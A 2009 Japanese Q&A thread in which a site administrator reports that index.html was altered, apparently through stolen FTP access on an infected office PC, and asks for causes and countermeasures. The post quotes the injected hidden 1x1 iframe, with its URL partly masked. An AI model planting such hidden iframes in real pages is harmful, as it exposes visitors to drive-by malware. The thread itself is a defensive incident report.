みんなの「教えて(疑問・質問)」にみんなで「答える」Q&Aコミュニティ

こんにちはゲストさん。会員登録(無料)して質問・回答してみよう!

解決済みの質問

<iframe>を使ったページ改ざんにあいました。対策をご教授お願いいたします。

初めて、質問をさせていただきます。
WEB関係の仕事をしていながら大変お恥ずかしいのですが、
アタックにより、管理しているウェブサイトの一部が改ざんされました。


(現象)
具体的には、「index.html」と名づけされたファイルの
ソース最終部分に、以下のコードが追記されていました。

【URLは念のため、書き換えています】
<iframe src="?http://***.net/?click=D1A4LDM"? width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
※他ファイル名は、拡張子が「html」であっても一切被害なし
※私は直接アクセスしていませんが、他担当によると、
 本ドメインに接続すると、ブラウザクラッシュしたとの報告がありました。
※click=以降の英数7文字は、乱数により各ページに異なった文字が記載

また、書き換えられたファイルのタイムスタンプを確認し、
該当時間のftpサーバログを調べると、社内IPからの接続形跡があり、
今回、改ざんされていた該当ファイルの書き換え履歴がありました。

現在、全ファイルの該当箇所を削除し、再アップロード。
また、利用していたFTPアカウントを廃止し、新規FTPアカウントを発行しました。

IDCには、サーバがクラックされた可能性がないが調査依頼し、
現在のところ、調査中です。


(ウイルスの疑いと、発見・駆除)
ただ、その時間帯に誰もFTPを行っていなかったため、
ウイルスの可能性が考えられ、対策ソフトでスキャンしたところ、
1台より、W32.Sality.AM というウイルスが検出され、駆除しました。
?http://www.threatexpert.com/report.aspx?md5=25583fd04e8f408a56f30ba...?

しかし、ウイルスの性質を見ても、ftpアカウントを盗聴し、
特定サイトに接続し、index.htmlファイルをダウンロード、改ざん、アップロードする・・といった行為を
働くようなことは記載されていませんでした。


(皆様へご相談)
FTPログに社内IPからのFTP接続履歴があったため、我々のセキュリティに問題があったことを
推測しているのですが、ウイルスレポートからも、発見されたウイルスが、現象を引き起こしたとは
特定しにくいと感じております。
そのため、ウイルス対策ソフトでは特定できない別のウイルスに感染している可能性を考えております。

国内のQ&Aサイトでは、同様の現象を発見できなかったため、
海外の掲示板を見たところ、同様の現象を発見したのですが、
原因までは特定されていませんでした。


そこで、ご存知の方がいらっしゃいましたらお知恵を拝借させていただきたいのですが、
本件の原因は何によるものでしょうか?
また、書き換えられた箇所削除・FTPアカウント変更の他にすべき対策や、
今後のための予防措置などあれば、アドバイスいただけますと有難く存じます。

何卒、宜しくお願いいたします。

投稿日時 - 2009-04-28 12:22:41

QNo.4915414

すぐに回答ほしいです

質問者が選んだベストアンサー

「index.html visibility hidden position absolute iframe」のキーワードでぐぐってみました。以下のURL(英語)に答えがあるように思えますが、いかがでしょうか。

一番詳しいのはここ↓
http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
この中で「AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.」と述べていることに注目。

ここ↓でも同様の書き込みが見つかる。
http://forums.digitalpoint.com/showthread.php?t=1081659

ここ↓では、攻撃者にページがハックされてコードが埋め込まれたのではないかと述べられ、ESETがJS/Kryptik.B trojanを削除したと書いてある。(同様の書き込みが複数見つかる。)
http://answers.yahoo.com/question/index?qid=20081221182928AAXXQcI

投稿日時 - 2009-04-28 13:45:51

お礼

アドバイスを頂き、ありがとうございます。
ご紹介いただいたサイトは、まさに探していた情報が記載されていました。

これまでに確認できた事実が、上記ウイルスのみであったことと、
他の情報サイトを確認しても侵入経路が不明というケースが多かったため、
大変参考になりました。

有難うございました!

投稿日時 - 2009-04-28 18:26:19

このQ&Aは役に立ちましたか?

0人が「このQ&Aが役に立った」と投票しています

回答(1)

あなたにオススメの質問